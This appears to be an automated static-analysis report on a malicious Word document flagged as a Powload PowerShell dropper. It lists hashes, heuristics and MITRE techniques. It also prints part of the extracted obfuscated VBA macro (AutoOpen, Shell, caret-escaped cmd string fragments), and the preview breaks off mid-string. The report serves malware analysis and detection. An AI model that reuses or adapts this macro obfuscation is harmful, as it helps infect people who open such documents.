Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f423b8bebb1e71d7…

MALICIOUS

Office (OLE)

85.5 KB Created: 2018-08-28 06:22:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: 7398023a479ca77e4c33509cb5f23423 SHA-1: 2ee250fe885b515617537e4c67f972457b419192 SHA-256: f423b8bebb1e71d7d8dae1ad6afdc93242c88b1a9d5f86f98fc4ff3d31cb53da
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call, indicated by the OLE_VBA_SHELL heuristic, and is flagged as an auto-executing macro (AutoOpen). The ClamAV detection name 'Doc.Dropper.Powload-6665575-0' suggests it acts as a dropper for a PowerShell payload. The macro's obfuscated string concatenation likely reconstructs a command to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Powload-6665575-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6665575-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10417 bytes
SHA-256: 3a4f2b5197ad6f8b47798091dd4a5987e6eed1c1ff78c66e06f9258456ee6942
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "HmKVOZRlvJw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "pffPRGhYozs"
Function triVjoPnY()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error 61325 / fNizz
   Error 79705 * ELkFOb / 37199 / NDYnFR
   Error rCzDO * PnBwBO
rYZBEHzWkmf = "M" + "D /v^:^" + "O " + " /R  " + Chr(2 + 0 + 5 + 2 + 25) + "  ^s^e" + "^" + "T ^  ^" + " ^ H^"
Error nXITif * KSWcoB
UWJInWJTrt = "D^u^o==" + "AAIAA" + "CAg" + "^AA^I^A" + "ACAg^AA" + "^IA^" + "AC^A^g" + "AA^I" + "A" + "AC^A^gA" + "AI^"
Error XmApw * VPQjj
   Error JrRWUG * NYBbd / 2955 * DzwrAS
   Error AEntf * 50499 / 7776 * LiXjd
JBZRbu = "A^ACA^" + "gAAIAA" + "C^A9B^" + "Q^" + "fAs" + "^H^A" + "o" + "^B^wYA" + "^QH^" + "AhBw^" + "Y^" + "A^0HA7"
Error VioMLH * FVXZGY / MdEar / rDwCR
XwXimJJFw = "A^" + "waA" + "EGAl" + "Bgc^AI" + "^" + "G" + "A" + "7^A^wc^" + "AQ^F^" + "A^" + "y^" + "B^AJA^"
Error scUiTw / oftNGv
   Error 12193 / bmihj / wraaD / lmuDc
uRPmhOlXjfN = "ACAt" + "^B^" + "QZAQHA" + "^J^BQL" + "A" + "^U^GA" + "r" + "^B" + "w^bA" + "YH" + "A^"
Error 85560 * vmcWY / 96722 * NkTwz
   Error IIjjlz / zCbpHT * 36344 * 81881
   Error 85945 / sVFLCG / Ojotf / lfOuwP
   Error CLLPl / 58623 / HGUuLP / iJiLa
   Error fdzrij / EttdCs / 97732 * iuhNC
UKUErUwnwM = "u^B^QS^" + "A^" + "s^DAp" + "^AwcA^Q" + "F^" + "AyBA^J" + "A^" + "AC" + "^" + "As^A^w" + "^b^A^8^"
Error iislFR * ztdUQc / 52591 * 11512
   Error EUWjEu / CPwnG
   Error MYcRHn / hNDXI
zJmvEuSPk = "G^" + "A^pB^" + "AJ^A" + "gCAlBA" + "^b^A^" + "k^G^" + "A^GBAZ^" + "A^E^GAv" + "^B^A^" + "bA4G^" + "A^3^"
Error wOBXid / 71873 * KbucEr * NpaoP
   Error 29201 * VkjLTV * 22853 / 10390
   Error uBAMJ / diAjk
fFVAsjmlwoz = "B" + "wbAQE" + "A^u^A^w" + "^U^A^" + "QG" + "^A6B^A"
Error 36898 * BlzfS
   Error 40088 / UHWVW
   Error 89295 * ritwIs
   Error 77582 / UzWVTb * jaNrH * YrFqdv
DzGSDBYilNt = "^J^AsH" + "A5Bgc" + "^" + "A^" + "QH^A7^B" + "^Q" + "KAc^" + "H^Ap" + "^BA" + "c" + "AQCAgA"
Error 83971 / BfiwaL * cusppT / zfIoc
   Error 37630 / zFwXzF
bajApJLOcn = "^g" + "b^Ak" + "GAg^Aw^" + "bA" + "^8GAp^B" + "A^JA^" + "gC" + "^A" + "^o^" + "B^" + "wY^A^E^"
Error 83390 * lEZOKv
XnLKCALrUIS = "G^A^l" + "^B" + "gcA^8" + "G^AmB" + "^w^O^" + "AcC"
Error fzofZ * uZqNZ * 72985 / 43817
   Error 1641 * EPojU * jtEoi * aZVFj
   Error 47900 / YzDLcZ
BUHGIbvK = "A" + "l" + "^" + "B^Ae^" + "A^UG" + "^AuA"
triVjoPnY = rYZBEHzWkmf + UWJInWJTrt + JBZRbu + XwXimJJFw + uRPmhOlXjfN + UKUErUwnwM + zJmvEuSPk + fFVAsjmlwoz + DzGSDBYilNt + bajApJLOcn + XnLKCALrUIS + BUHGIbvK
   Error 33734 / OjAilz * WnFYn / VlGpV
End Function
Function FzvlhpU()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error 45394 / GwMSjW * 79643 / nAiPbX
   Error GXHEkz / rGXwww
AraDr = "w^JA" + "sC^" + "A^q^Bg" + "^Q^Ao" + "G^A" + "k^A" + "wKAcC^A"
Error 93879 / FULLX
   Error 75844 / ovpEGY
   Error 75584 / XQrtFE
   Error BSpmlS * BBnwq
   Error 1111 / KYijB
GSRtMmKuUjw = "cB" + "w^J" + "^A^" + "s" + "CAj^B" + "^Q" + "a^A^w" + "^G^" + "A^" + "i" + "^B^Q^d"
Error 88328 * aDPqG
   Error tOZzhi * mPGZmm / vANYr / RhfiQ
   Error duuSO * HaJmYu
   Error mOlBr / NOcNmj
RFLHPi = "A^A^" + "H^A^6A" + "g^dA" + "4G^A^l^" + "B"
Error iJDmin * WbrOj
   Error zjGtHt * DBROfh
FfZWKtEOYf = "A^J^A0" + "^DA^z" + "B^A" + "VA^IH" + "A"
Error TmItGi * IGhGbj
   Error iURNEG * mHwzY
   Error JHzaj * bWFTEi / lYzFJ * jJuREm
oFiwX = "^k^A" + "w^O" + "^" + "Ac" + "CA3A^" + "g" + "^M^A" + "Y^D^An" + "^A" + "^AI^A0D" + "^Ag^Ag" + "^aAIEA" + "q^B^"
Error wIZzQ * Itpkp / Pqtot * IkzZw
OaBmZUskTR = "A^J^AsD" + "ApA^w" + "^J" + "^" + "A^A^E^A" + "nAA" + "K^A^Q^H" + "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.